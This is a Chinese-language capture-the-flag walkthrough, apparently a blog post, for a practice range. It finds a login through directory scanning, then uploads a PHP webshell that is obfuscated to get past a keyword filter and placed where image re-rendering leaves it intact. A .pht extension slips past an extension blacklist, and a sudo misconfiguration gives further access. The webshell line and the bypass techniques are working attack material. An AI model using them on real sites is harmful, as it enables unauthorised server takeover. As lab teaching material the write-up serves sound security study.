毯子靶场.

当我们的ubuntu镜像添加了以后,和容器启动了以后,我们就可以访问这个页面

在浏览器输入ip+端口,访问后发现一个登录页面

需要账户名和密码,而我们不知道账户名和密码

用了几次弱密码暴力破解,没破解出来,尝试换一个角度破解


就先用御剑扫一下,尝试得到点有用的东西

扫出来了六个网址


打开第一个网址

其他的都没有什么用

只有这个有一些特殊的符号

先猜测这个会不会是密码

打开第二个网址

还是一个登录页面

打开第三个网址

查看网页源码

得到了账户名:admin

还有第二个flag

打开第四个网址

得到了第一个flag

打开第五个网址

似乎没有什么用,就先跳过

第六个网址

还是一个登录页面

那我们尝试用刚刚的账户名和密码进行登录一下]

用户名:admin

密码:3v1l_H@ck3r


可以登录上去

登录上去后就进到了这个页面

这里就得知,需要上传文件到服务器才可以获取剩余的flag


我们就先随便上传一个文件

发现文件只能上传jpg,jpeg,gif,的文件

多次尝试之后,我们发现文件上传要求有

1.jpg,jpeg,gif,的文件

2.要是一个图像文件

3.文件大小在20kb——100kb之间

我们就先制作一个合适的文件

先找一个20kb——100kb的图片

然后在创建一个php一句话木马文件

<<??pphphp @evalval($_POST['cmd']); ?>

这里php要用双写方式,因为限制会把这些字符替换为空

然后把创建好的.jpg图像文件进行上传

然后复制一下目录,看一眼我们上传的文件

这时我们可以清楚的看到图片已经跟上传的原图片不一样了

应该是被二次渲染了,所以导致的

把这个文件进行另存为一下

然后打开010 Editor

工具 里面的 比较文件

把原文件和另存为后的文件进行比较一下

然后点击下面的匹配,查看两个文件匹配的地方都有哪些

因为在网页上传文件的时候,会被二次渲染,所以如果把一句话木马加入到了这里面不匹配的地方,在网页上传文件的时候,木马就被渲染掉了,所以把一句话木马加入到两个文件匹配的地方

然后再把刚刚加入了一句话木马的文件进行上传

然后我们再用burp进行拦截抓包一下

因为php一句话木马要使用php才可以,所以后缀面要在burp里面改成php

这里发现使用php的时候,他显示不符合要求,这里可能存在一个黑名单

所以我们使用畸形后缀的方式

把后缀名改成.pht

可以上传成功

我们把这个路径复制一下,再看一眼上传的文件

这里出来一堆乱七八糟的东西

然后我们F12,开发者工具

HackbBar,测试一下php木马能否运行

先点击LOAD输入cmd=phpinfo();

然后点击EXECUTE运行

然后就会出现php的一些信息

把这里全部复制下来

然后打开蚁剑,右键添加数据,然后与刚刚复制的地址进行连接

连接成功后,双击进入

然后我们就会看到目录列表

然后点击html,就能看到里面有个关于flag的文件

flag.txt点击进去后,什么也没有,应该是拒绝访问

然后点击fl000g3.txt进去看看

然后在里面,也是成功得到了第三个flag

然后上边的英文意思是

尝试读取flag.txt文件,您可以在/etc中找到一个标志;)

打开蚁剑的终端,输入命令:

grep -r flag /etc

出现以下信息

找到第四个flag


直接打开flag.txt显示没有权限

ls -al 看一下flag.txt 文件的所属用户

sudo -l 发现当前www-data用户可以sudo执行任何命令

`(ALL) NOPASSWD: ALL`:表示xxx用户可以以任何用户身份(ALL)执行任何命令(ALL)而无需输入密码。

`(ALL : ALL) ALL`:表示xxx用户可以以任何用户身份(ALL)执行任何命令(ALL)。

sudo cat flag.txt ,拿到了第五个flag

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值